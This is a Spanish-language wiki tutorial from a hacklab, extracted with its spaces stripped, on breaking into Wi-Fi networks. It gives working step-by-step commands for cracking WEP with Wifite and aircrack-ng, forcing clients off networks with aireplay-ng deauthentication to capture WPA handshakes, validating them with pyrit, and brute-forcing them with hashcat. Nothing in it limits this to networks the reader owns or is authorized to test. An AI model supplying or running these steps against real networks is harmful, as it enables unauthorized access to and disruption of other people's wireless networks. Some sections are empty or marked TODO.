Documentos de Académico
Documentos de Profesional
Documentos de Cultura
CmohackearWIFIHackLab
CmohackearWIFI
DeHackLab
EsteartculoasumequetensunpendrivevivoconWifislax(otensinstaladoslosprogramasnecesarios)y
sabscmoarrancardesdeunpendriveeinstalarGNU/Linux.
Nota:Sisabestantodeberasestarleenseandoatusamigas!
Contenido
1WEP
1.1Wifite
1.2Aircrack
1.2.1Levantamosunainterfazenmodomonitor
1.2.2Escaneamosparaverlasredes
1.2.3Empezamosacapturareltrfico
1.2.4Inyectamospaquetes
1.2.5Crackeamoslaclave
2WPA/WPA2
2.1CapturarSaludo(Handshake)
2.1.1Handshaker
2.1.2Wifite
2.1.3Aircrack
2.2ValidarSaludo
2.3LimpiarSaludo
2.4CrackearSaludo
2.4.1CrackearconHashcat
3WPS
WEP
SivesunaredWEPconsuficientesealyusuariosconectados(clientes)muyprobablementeconsigasla
clave.
Wifite
Abrimosunaterminalyejecutamoswifitecomoroot.
sudowifite
.;'`;,
.;',;'`;,`;,WiFitev2(r86)
.;',;',;'`;,`;,`;,
:::::():::::automatedwirelessauditor
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI
1/6
10/4/2016
CmohackearWIFIHackLab
':.':.':./_\,:',:',:'
':.':./___\,:',:'designedforLinux
':./_____\,:'
/\
[+]scanningforwirelessdevices...
[+]enablingmonitormodeonwlp3s0...done
[+]initializingscan(mon0),updatesat5secintervals,CTRL+Cwhenready.
[0:00:04]scanningwirelessnetworks.0targetsand0clientsfound
[+]scanning(mon0),updatesat5secintervals,CTRL+Cwhenready.
CuandoaparezcansuficintesredesyclientesledamosCTRL+C
Nota:
wlp3s0,wlan0,usb0,etcsonnuestrasinterfacesderedinalambricas.Unaplacadewifi,undongle
usb,nuestropuertoethernetsoninterfacesderedporlasquepuedehablarnuestrosistema
operativoconlared.
mon0,esunainterfazderedenmodomonitorestasnospermitenescucharytransmitiroinyectar
paquetesquelellegaranalosdemasclientesyAPs(AccessPointsoPuntosdeAcceso)
NUMESSIDCHENCRPOWERWPS?CLIENT
1Fibertel1WEP53dbno
2Arnet1WPA47dbno
3Goku1WPA232dbno
[+]selecttargetnumbers(15)separatedbycommas,or'all':
ElegimosunaredqueuseWEPytengaclientes
Nota:
ESSIDeselnombredelaredwifi.
CHochanneleselcanal,unnumerodel1al11queindicalafrecuencia.Wififuncionaauna
frecuenciade2.4Ghzo2400Mhz.
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI
2/6
10/4/2016
CmohackearWIFIHackLab
ENCReselmtododeencriptado:abierto,WEP,WPAoWPA2.
WPS?sielAPsoportaWPSono.
CLIENTsidetectamosalgunclientedelAP.
EsperaaquegeneresuficientesIVs.
Aveceswifitepierdelapacienciaycortaantes,talvezquierasprobarelmtododeaircrackqueesunpoco
msmanual.
Aircrack
Levantamosunainterfazenmodomonitor
sudoairmonngstartwlan0
Nota:Reemplazamoswlan0porelnombredenuestrainterfazderedinalmbrica.sudoairmonngnos
muestraellistadodeinterfaces.
Escaneamosparaverlasredes
sudoairodumpngmon0
CuandohayamosdetectadolasredesdeseadascortamosconCTRL+C.
Nota:Podemosfiltrarpordiferentescamposparaobtenersololosresultadosquenosinteresen.
channelxelcanalenelquequeremosescuchar.
encryptwepeltipodeencriptacinquequeremosdetectar.
bssid01:23:45:67:89:ablamacaddressdelAPquequeremosescuchar.
mon0loreemplazamosporelnombredenuestrainterfazenmodomonitor(generalmentemon0).
Empezamosacapturareltrfico
sudoairodumpngwsalidaivschannel1bssid01:23:45:67:89:abmon0
YlodejamoscapturandotodoslosIVsquenecesitemos(columna#Data).
Nota:
wsalidaledicequeguardeeltraficocapturadoenelarchivosalida.
ivsledicequesologuardelosIVs(loquerealmentenecesitamospararomperWEP.)
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI
3/6
10/4/2016
CmohackearWIFIHackLab
Inyectamospaquetes
Sinohaymuchosclientesotrficooqueremosacelerarelprocesopodemosinyectarpaquetesconaireplay.
**TODO**
miralasopcionesdeaireplayngconh
Crackeamoslaclave
ParaestonecesitarasmuchosIVs,alrededorde5000o10000suelensersuficientes.Noesnecesario
detenerelairodumpparahaceresto,sinoalcanzanlosIVsenelmomentoaircrackesperaryvolvera
intentarcuandohayams.
aircrackngsalida.cap
WPA/WPA2
CapturarSaludo(Handshake)
Handshaker
Wifite
SiguelospasosparaWEPperoseleccionandounareddiferente.Muchasvecesnofunciona.
Aircrack
Primerolevantamosunainterfazenmodomonitor(vermsarriba).
Luegoempezacapturarlospaquetesenunarchivo.Estecomandoguardarlospaquetesenviadosdesdey
haciaelrouterconmacaddress00:11:aa:bb:cc:ddycanal11enelarchivosalida.cap.
sudoairodumpngchannel11bssid00:11:aa:bb:cc:ddwsalidamon0
Nota:Sinosabeselcanaloelbssid(macaddress)delared,podescorrerelsiguientecomandoyfijarte
cualesaparecen.
sudoairodumpngmon0
Yfinalmentedesconectaalagilada(tienequehaberusuariosconectadosalwifi).Paraestousamosaireplay
conlaopciondeautho0ycuantosintentosdedesconexionqueremoshacer.Paraestoesconveniente
tenerbuenasealtantoconelroutercomoconelcliente.
aireplayng08caa:aa:aa:aa:aa:aaa00:11:aa:bb:cc:dd
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI
4/6
10/4/2016
CmohackearWIFIHackLab
aireplayng08caa:aa:aa:aa:aa:aaa00:11:aa:bb:cc:dd
Nota:
caa:aa:aa:aa:aa:aaLamacaddressdelosclientesostations,sinolaponemosintentar
desconectartodoslosclientesdeeserouter.
a00:11:aa:bb:cc:ddLamacaddressdelAPorouter.Estaopcinesrequerida.
08odeauth8Seguidodeunnumeroescuantosintentosdedesconectaralosclientesqueremos
hacer.0intentarasinparar.
ValidarSaludo
PyritesunprogramamuycompletoparacrackearclavesWPAytieneunafuncionalidadmuypracticaque
nosdicelacalidaddelsaludoquehemoscapturado.Aveceslamalasealhacequetengamosquecapturar
variossaludoshastaqueunoestacompleto.
pyritrsalida.capanalyze
LimpiarSaludo
Juntoconelsaludosecapturamuchotrafico,conpyritpodemoslimpiarlasalidacapturadayguardarsolo
elsaludoquequeremos.
pyritrsalida.caposalidalimpia.capstrip
CrackearSaludo
Pyritesmasrpidoparacrackearclavesbasadoendiccionariosperonotieneotrasfuncionalidadesquesi
tienenotrosprogramasespecificosdecrackeodeclavescomomascarasyataquesdefuerzabruta.Poresto
avecesvamosapreferirusarhashcat.
CrackearconHashcat
Primerovamosatenerqueconvertirlacapturadelformatocapalformatohccapqueeselutilizadopor
hashcat.Lohacemosconelsiguientecomandoquenosdejaraunarchivosalida.hccap
aircrackngsalida.capJsalida
Acrackearqueseacabaelmundo!
hashcatm2500a3salida.hccap?d?d?d?d?d?d?d?d
Nota:
Chequealadocumentacinparamasayuda.
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI
5/6
10/4/2016
CmohackearWIFIHackLab
m2500Quetipodeclavequeremoscrackear,enestecasoWPA.
a3Quetipodeataque.Enestecaso3fuerzabruta.
salida.hccapelarchivoconelsaludo.
?d?d?d?d?d?d?d?dmascaraparaelataqueporfuerzabruta,8caracteresnumricos.
WPS
Obtenidodehttps://wiki.hackcoop.com.ar/index.php?title=Cmo_hackear_WIFI&oldid=7044
Estapginafuemodificadaporltimavezel11feb2016alas04:16.
Elcontenidoestdisponiblebajolalicenciahttps://creativecommons.org/licenses/bysa/3.0/legalcode
amenosqueseindiquelocontrario.
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI
6/6